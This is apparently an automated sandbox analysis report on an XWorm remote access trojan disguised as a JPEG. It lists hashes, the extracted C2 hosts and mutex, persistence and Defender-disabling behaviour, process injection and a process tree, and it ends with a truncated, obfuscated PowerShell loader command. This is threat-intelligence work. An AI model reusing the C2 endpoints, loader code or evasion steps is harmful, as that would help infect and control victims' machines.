xworm | 54d8f92fe68af989165b1a99c28559e0a83664e29f6c92791626272682727306

General

Target

download (2).jpg
Size

18KB
MD5

ab1f2276fced848c00c9b929e6be6c8e
SHA1

5fc55adbb1724395f424a124b2e2effe888a5b21
SHA256

54d8f92fe68af989165b1a99c28559e0a83664e29f6c92791626272682727306
SHA512

ff37dac0c234e929cba39822ac4da117b882b6096aa749aac38cf71c33c49a8c78bce9e72179695f1f491f27dee7cb84481bfe08ef0f10fa72c1c09a74967499
SSDEEP

384:8NkWwdjN+VFzFFC2R30Mkwwp8dmXklOYR1+/u5fCYnIlaGB6:FN6h7pxsvUE/ya6

Score

10^/10

xworm evasion persistence rat trojan

Malware Config

Extracted

Family

xworm

C2

news-accept.gl.at.ply.gg:24727

wiz.bounceme.net:6000

Mutex

ew0h9RSfAfyU3YO4

Attributes

Install_directory
%AppData%
install_file
USB.exe

aes.plain

Signatures

Contains code to disable Windows Defender 1 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

Processes:

resource	yara_rule
behavioral1/memory/808-831-0x000000001B260000-0x000000001B26C000-memory.dmp	disable_win_def

Detect Xworm Payload 3 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\x4s.exe	family_xworm
behavioral1/memory/808-62-0x0000000000180000-0x000000000018E000-memory.dmp	family_xworm
behavioral1/memory/808-777-0x000000001BDE0000-0x000000001BDEE000-memory.dmp	family_xworm

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

powershell.EXE

description pid process target process

PID 3820 created 588 3820 powershell.EXE winlogon.exe
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Blocklisted process makes network request 4 IoCs

Processes:

powershell.exe

flow pid process

3 2756 powershell.exe
4 2756 powershell.exe
6 2756 powershell.exe
9 2756 powershell.exe
Disables Task Manager via registry modification
evasion
Downloads MZ/PE file
Executes dropped EXE 3 IoCs

Processes:

svchost32.exex4s.exex4Shellcode.exe

pid process

4244 svchost32.exe
808 x4s.exe
4896 x4Shellcode.exe
Loads dropped DLL 1 IoCs

Processes:

x4s.exe

pid process

808 x4s.exe

description	pid	process	target process
PID 3820 created 588	3820	powershell.EXE	winlogon.exe

flow	pid	process
3	2756	powershell.exe
4	2756	powershell.exe
6	2756	powershell.exe
9	2756	powershell.exe

pid	process
4244	svchost32.exe
808	x4s.exe
4896	x4Shellcode.exe

pid	process
808	x4s.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

x4s.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Windows\CurrentVersion\Run\x4s = "C:\\Users\\Admin\\AppData\\Roaming\\x4s.exe"	x4s.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

8 raw.githubusercontent.com
9 raw.githubusercontent.com
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

12 ip-api.com

flow	ioc
8	raw.githubusercontent.com
9	raw.githubusercontent.com

flow	ioc
12	ip-api.com

Drops file in System32 directory 9 IoCs

Processes:

svchost.exeOfficeClickToRun.exesvchost.exepowershell.EXE

description	ioc	process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Audio%4PlaybackManager.evtx	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187	OfficeClickToRun.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Audio%4Operational.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Audio%4CaptureMonitor.evtx	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	OfficeClickToRun.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.EXE

description pid process target process

PID 3820 set thread context of 4276 3820 powershell.EXE dllhost.exe

description	pid	process	target process
PID 3820 set thread context of 4276	3820	powershell.EXE	dllhost.exe

Drops file in Windows directory 3 IoCs

Processes:

taskmgr.exepowershell.exe

description	ioc	process
File created	C:\Windows\rescache\_merged\4183903823\2290032291.pri	taskmgr.exe
File created	C:\Windows\rescache\_merged\1601268389\715946058.pri	taskmgr.exe
File created	C:\Windows\svchost32.exe	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

taskmgr.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

taskmgr.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	taskmgr.exe

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry
T1012

System Information Discovery
T1082

Processes:

wmiprvse.exe

description ioc process

Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	wmiprvse.exe

Modifies data under HKEY_USERS 54 IoCs

Processes:

powershell.EXEOfficeClickToRun.exesvchost.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 50,1329 10,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.EXEdllhost.exewmiprvse.exe

pid	process
2756	powershell.exe
2756	powershell.exe
2756	powershell.exe
3820	powershell.EXE
3820	powershell.EXE
3820	powershell.EXE
3820	powershell.EXE
4276	dllhost.exe
4276	dllhost.exe
4276	dllhost.exe
4276	dllhost.exe
4276	dllhost.exe
4276	dllhost.exe
4276	dllhost.exe
4276	dllhost.exe
4276	dllhost.exe
4276	dllhost.exe
4812	wmiprvse.exe
4812	wmiprvse.exe
4812	wmiprvse.exe
4812	wmiprvse.exe
4812	wmiprvse.exe
4812	wmiprvse.exe
4276	dllhost.exe
4276	dllhost.exe
4276	dllhost.exe
4276	dllhost.exe
4276	dllhost.exe
4276	dllhost.exe
4276	dllhost.exe
4276	dllhost.exe
4276	dllhost.exe
4276	dllhost.exe
4276	dllhost.exe
4276	dllhost.exe
4276	dllhost.exe
4276	dllhost.exe
4276	dllhost.exe
4276	dllhost.exe
4276	dllhost.exe
4276	dllhost.exe
4276	dllhost.exe
4276	dllhost.exe
4276	dllhost.exe
4276	dllhost.exe
4276	dllhost.exe
4276	dllhost.exe
4276	dllhost.exe
4276	dllhost.exe
4276	dllhost.exe
4276	dllhost.exe
4276	dllhost.exe
4276	dllhost.exe
4276	dllhost.exe
4276	dllhost.exe
4276	dllhost.exe
4276	dllhost.exe
4276	dllhost.exe
4276	dllhost.exe
4276	dllhost.exe
4276	dllhost.exe
4276	dllhost.exe
4276	dllhost.exe
4276	dllhost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exesvchost32.exex4s.exepowershell.EXEdllhost.exesvchost.exesvchost.exewmiprvse.exesvchost.exeExplorer.EXEtaskmgr.exe

description	pid	process
Token: SeDebugPrivilege	2756	powershell.exe
Token: SeDebugPrivilege	4244	svchost32.exe
Token: SeDebugPrivilege	808	x4s.exe
Token: SeDebugPrivilege	3820	powershell.EXE
Token: SeDebugPrivilege	3820	powershell.EXE
Token: SeDebugPrivilege	4276	dllhost.exe
Token: SeAssignPrimaryTokenPrivilege	2400	svchost.exe
Token: SeIncreaseQuotaPrivilege	2400	svchost.exe
Token: SeSecurityPrivilege	2400	svchost.exe
Token: SeTakeOwnershipPrivilege	2400	svchost.exe
Token: SeLoadDriverPrivilege	2400	svchost.exe
Token: SeSystemtimePrivilege	2400	svchost.exe
Token: SeBackupPrivilege	2400	svchost.exe
Token: SeRestorePrivilege	2400	svchost.exe
Token: SeShutdownPrivilege	2400	svchost.exe
Token: SeSystemEnvironmentPrivilege	2400	svchost.exe
Token: SeUndockPrivilege	2400	svchost.exe
Token: SeManageVolumePrivilege	2400	svchost.exe
Token: SeAuditPrivilege	2172	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2400	svchost.exe
Token: SeIncreaseQuotaPrivilege	2400	svchost.exe
Token: SeSecurityPrivilege	2400	svchost.exe
Token: SeTakeOwnershipPrivilege	2400	svchost.exe
Token: SeLoadDriverPrivilege	2400	svchost.exe
Token: SeSystemtimePrivilege	2400	svchost.exe
Token: SeBackupPrivilege	2400	svchost.exe
Token: SeRestorePrivilege	2400	svchost.exe
Token: SeShutdownPrivilege	2400	svchost.exe
Token: SeSystemEnvironmentPrivilege	2400	svchost.exe
Token: SeUndockPrivilege	2400	svchost.exe
Token: SeManageVolumePrivilege	2400	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2400	svchost.exe
Token: SeIncreaseQuotaPrivilege	2400	svchost.exe
Token: SeSecurityPrivilege	2400	svchost.exe
Token: SeTakeOwnershipPrivilege	2400	svchost.exe
Token: SeLoadDriverPrivilege	2400	svchost.exe
Token: SeSystemtimePrivilege	2400	svchost.exe
Token: SeBackupPrivilege	2400	svchost.exe
Token: SeRestorePrivilege	2400	svchost.exe
Token: SeShutdownPrivilege	2400	svchost.exe
Token: SeSystemEnvironmentPrivilege	2400	svchost.exe
Token: SeUndockPrivilege	2400	svchost.exe
Token: SeManageVolumePrivilege	2400	svchost.exe
Token: SeDebugPrivilege	4812	wmiprvse.exe
Token: SeAuditPrivilege	2000	svchost.exe
Token: SeAuditPrivilege	2172	svchost.exe
Token: SeAuditPrivilege	2172	svchost.exe
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeShutdownPrivilege	3396	Explorer.EXE
Token: SeCreatePagefilePrivilege	3396	Explorer.EXE
Token: SeDebugPrivilege	2508	taskmgr.exe
Token: SeSystemProfilePrivilege	2508	taskmgr.exe
Token: SeCreateGlobalPrivilege	2508	taskmgr.exe
Token: SeAuditPrivilege	2000	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2400	svchost.exe
Token: SeIncreaseQuotaPrivilege	2400	svchost.exe
Token: SeSecurityPrivilege	2400	svchost.exe
Token: SeTakeOwnershipPrivilege	2400	svchost.exe
Token: SeLoadDriverPrivilege	2400	svchost.exe
Token: SeSystemtimePrivilege	2400	svchost.exe
Token: SeBackupPrivilege	2400	svchost.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

dwm.exetaskmgr.exeExplorer.EXE

pid	process
960	dwm.exe
960	dwm.exe
960	dwm.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
3396	Explorer.EXE
3396	Explorer.EXE
2508	taskmgr.exe
2508	taskmgr.exe
960	dwm.exe
2508	taskmgr.exe
2508	taskmgr.exe
960	dwm.exe
960	dwm.exe
960	dwm.exe
960	dwm.exe
2508	taskmgr.exe
960	dwm.exe
960	dwm.exe
960	dwm.exe
960	dwm.exe
960	dwm.exe
960	dwm.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

taskmgr.exeExplorer.EXE

pid	process
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
3396	Explorer.EXE
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe
3396	Explorer.EXE
2508	taskmgr.exe
2508	taskmgr.exe
2508	taskmgr.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exepowershell.exesvchost32.exepowershell.EXEdllhost.exe

description	pid	process	target process
PID 3628 wrote to memory of 2756	3628	cmd.exe	powershell.exe
PID 3628 wrote to memory of 2756	3628	cmd.exe	powershell.exe
PID 2756 wrote to memory of 4244	2756	powershell.exe	svchost32.exe
PID 2756 wrote to memory of 4244	2756	powershell.exe	svchost32.exe
PID 4244 wrote to memory of 808	4244	svchost32.exe	x4s.exe
PID 4244 wrote to memory of 808	4244	svchost32.exe	x4s.exe
PID 4244 wrote to memory of 4896	4244	svchost32.exe	x4Shellcode.exe
PID 4244 wrote to memory of 4896	4244	svchost32.exe	x4Shellcode.exe
PID 4244 wrote to memory of 4896	4244	svchost32.exe	x4Shellcode.exe
PID 3820 wrote to memory of 4276	3820	powershell.EXE	dllhost.exe
PID 3820 wrote to memory of 4276	3820	powershell.EXE	dllhost.exe
PID 3820 wrote to memory of 4276	3820	powershell.EXE	dllhost.exe
PID 3820 wrote to memory of 4276	3820	powershell.EXE	dllhost.exe
PID 3820 wrote to memory of 4276	3820	powershell.EXE	dllhost.exe
PID 3820 wrote to memory of 4276	3820	powershell.EXE	dllhost.exe
PID 3820 wrote to memory of 4276	3820	powershell.EXE	dllhost.exe
PID 3820 wrote to memory of 4276	3820	powershell.EXE	dllhost.exe
PID 4276 wrote to memory of 588	4276	dllhost.exe	winlogon.exe
PID 4276 wrote to memory of 644	4276	dllhost.exe	lsass.exe
PID 4276 wrote to memory of 744	4276	dllhost.exe	svchost.exe
PID 4276 wrote to memory of 900	4276	dllhost.exe	svchost.exe
PID 4276 wrote to memory of 960	4276	dllhost.exe	dwm.exe
PID 4276 wrote to memory of 356	4276	dllhost.exe	svchost.exe
PID 4276 wrote to memory of 632	4276	dllhost.exe	svchost.exe
PID 4276 wrote to memory of 596	4276	dllhost.exe	svchost.exe
PID 4276 wrote to memory of 1048	4276	dllhost.exe	svchost.exe
PID 4276 wrote to memory of 1132	4276	dllhost.exe	svchost.exe
PID 4276 wrote to memory of 1236	4276	dllhost.exe	svchost.exe
PID 4276 wrote to memory of 1244	4276	dllhost.exe	svchost.exe
PID 4276 wrote to memory of 1252	4276	dllhost.exe	svchost.exe
PID 4276 wrote to memory of 1312	4276	dllhost.exe	svchost.exe
PID 4276 wrote to memory of 1400	4276	dllhost.exe	svchost.exe
PID 4276 wrote to memory of 1420	4276	dllhost.exe	svchost.exe
PID 4276 wrote to memory of 1460	4276	dllhost.exe	svchost.exe
PID 4276 wrote to memory of 1472	4276	dllhost.exe	svchost.exe
PID 4276 wrote to memory of 1544	4276	dllhost.exe	svchost.exe
PID 4276 wrote to memory of 1580	4276	dllhost.exe	svchost.exe
PID 4276 wrote to memory of 1596	4276	dllhost.exe	svchost.exe
PID 4276 wrote to memory of 1708	4276	dllhost.exe	svchost.exe
PID 4276 wrote to memory of 1716	4276	dllhost.exe	svchost.exe
PID 4276 wrote to memory of 1724	4276	dllhost.exe	svchost.exe
PID 4276 wrote to memory of 1776	4276	dllhost.exe	svchost.exe
PID 4276 wrote to memory of 1808	4276	dllhost.exe	svchost.exe
PID 4276 wrote to memory of 1940	4276	dllhost.exe	spoolsv.exe
PID 4276 wrote to memory of 2000	4276	dllhost.exe	svchost.exe
PID 4276 wrote to memory of 1216	4276	dllhost.exe	svchost.exe
PID 4276 wrote to memory of 2172	4276	dllhost.exe	svchost.exe
PID 4276 wrote to memory of 2212	4276	dllhost.exe	svchost.exe
PID 4276 wrote to memory of 2224	4276	dllhost.exe	svchost.exe
PID 4276 wrote to memory of 2296	4276	dllhost.exe	sysmon.exe
PID 4276 wrote to memory of 2316	4276	dllhost.exe	svchost.exe
PID 4276 wrote to memory of 2372	4276	dllhost.exe	svchost.exe
PID 4276 wrote to memory of 2380	4276	dllhost.exe	svchost.exe
PID 4276 wrote to memory of 2400	4276	dllhost.exe	svchost.exe
PID 4276 wrote to memory of 2420	4276	dllhost.exe	svchost.exe
PID 4276 wrote to memory of 2632	4276	dllhost.exe	svchost.exe
PID 4276 wrote to memory of 3000	4276	dllhost.exe	unsecapp.exe
PID 4276 wrote to memory of 3008	4276	dllhost.exe	svchost.exe
PID 4276 wrote to memory of 3024	4276	dllhost.exe	sihost.exe
PID 4276 wrote to memory of 2840	4276	dllhost.exe	taskhostw.exe
PID 4276 wrote to memory of 3256	4276	dllhost.exe	svchost.exe
PID 4276 wrote to memory of 3396	4276	dllhost.exe	Explorer.EXE
PID 4276 wrote to memory of 3928	4276	dllhost.exe	RuntimeBroker.exe
PID 4276 wrote to memory of 2140	4276	dllhost.exe	DllHost.exe

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:588

C:\Windows\system32\dwm.exe
"dwm.exe"
2⤵
- Suspicious use of FindShellTrayWindow
PID:960

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{09255450-c7d6-474f-a178-62c699239393}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4276

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:644

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
1⤵
PID:744

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
1⤵
PID:900

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:356

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
1⤵
PID:632

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
1⤵
PID:596

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
PID:1048

c:\windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
2⤵
PID:2840

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:VhHvpPjEINuB{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$FFtUTnlGmJqauN,[Parameter(Position=1)][Type]$tGcfIEGOpj)$mruFQuehGWB=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object 